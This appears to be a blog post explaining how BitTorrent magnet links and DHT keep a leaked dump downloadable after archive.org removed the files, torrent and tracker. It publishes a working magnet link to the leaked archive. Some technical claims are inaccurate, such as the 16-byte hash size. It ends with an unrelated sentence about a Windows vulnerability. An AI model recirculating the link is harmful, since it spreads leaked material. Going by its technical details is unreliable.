The tl;dr version is this: anything published via BitTorrent has a matching "magnet link" address, and the contents can still be reached via magnet links when the original publisher goes away.


In this case, the leaker uploaded to "archive.org", a popular Internet archiving resource. This website allows you to either download files directly, which is slow, or via peer-to-peer using BitTorrent, which is fast. As you know, BitTorrent works by all the downloaders exchanging pieces with each other, rather getting them from the server. I give you a piece you don't have, in exchange for a piece I don't have.

BitTorrent, though still requires a "torrent" (a ~30k file that lists all the pieces) and a "tracker" (http://bt1.archive.org:6969/announce) that keeps a list of all the peers so they can find each other. The tracker also makes sure that every piece is available from at least one peer.

When "archive.org" realized what was happening, they deleted the leaked files, the torrent, and the tracking.

However, BitTorrent has another feature called "magnet links". This is simply the "hash" of the "torrent" file contents, which looks something like "06724742e86176c0ec82e294d299fba4aa28901a". (This isn't a hash of the entire file, but just the important parts, such as the filenames and sizes).

Along with downloading files, BitTorrent software on your computer also participates in a "distributed hash" network. When using a torrent file to download, your BitTorrent software still tell other random BitTorrent clients about the hash. Knowledge of this hash thus spreads throughout the BitTorrent world. It's only 16 bytes in size, so the average BitTorrent client can keep track of millions of such hashes while consuming very little memory or bandwidth.

If somebody decides they want to download the BitTorrent with that hash, they broadcast that request throughout this "distributed hash" network until they find one or more people with the full torrent. They then get the torrent description file from them, and also a list of peers in the "swarm" who are downloading the file.

Thus, when the original torrent description file, the tracker, and original copy goes away, you can still locate the swarm of downloaders through this hash. As long as all the individual pieces exist in the swarm, you can still successfully download the original file.

In this case, one of the leaked documents was a 2.3 gigabyte file called "langannerch.rar". The torrent description file called "langanerch_archive.torrent" is 26 kilobytes in size. The hash (magnet link) is 16 bytes in size, written "magnet:?xt=urn:btih:06724742e86176c0ec82e294d299fba4aa28901a". If you've got BitTorrent software installed and click on the link, you'll join the swarm and start downloading the file, even though the original torrent/tracker/files have gone away.

According to my BitTorrent client, there are currently 108 people in the swarm downloading this file world-wide. I'm currently connected to 11 of them. Most of them appear to be located in France.

Looking at the General tab, I see that "availability" is 2.95. That means there exist 2.95 complete copies of the download. In other words, if there are 20 pieces, it means that for one of the pieces in the swarm, only 2 people have it. This is dangerously small -- if those two people leave the network, then a complete copy of the dump will no longer exist in the swarm, and it'll be impossible to download it all.

Such dumps can remain popular enough for years after the original tracker/torrent has disappeared, but at some point, a critical piece disappears, and it becomes impossible for anybody to download more than 99.95%, with everyone in the swarm waiting for that last piece. If you read this blogpost 6 months from now, you are likely to see 10 people in the swarm, all stuck at 99.95% complete.

Conclusion
The upshot of this is that it's hard censoring BitTorrent, because all torrents also exist as magnet links. It took only a couple hours for Archive.org to take down the tracker/torrents/files, but after complete downloads were out in the swarm, all anybody needed was the hash of the original torrent to create a magnet link to the data. Those magnet links had already been published by many people. The Wikileaks tweet that linked to them was fairly late, all things considered, other people had already published them.

Google Project Zero researchers Tavis Ormandy and Natalie Silvanovich found a remotely exploitable Windows vulnerability that Ormandy called he worst in recent memory.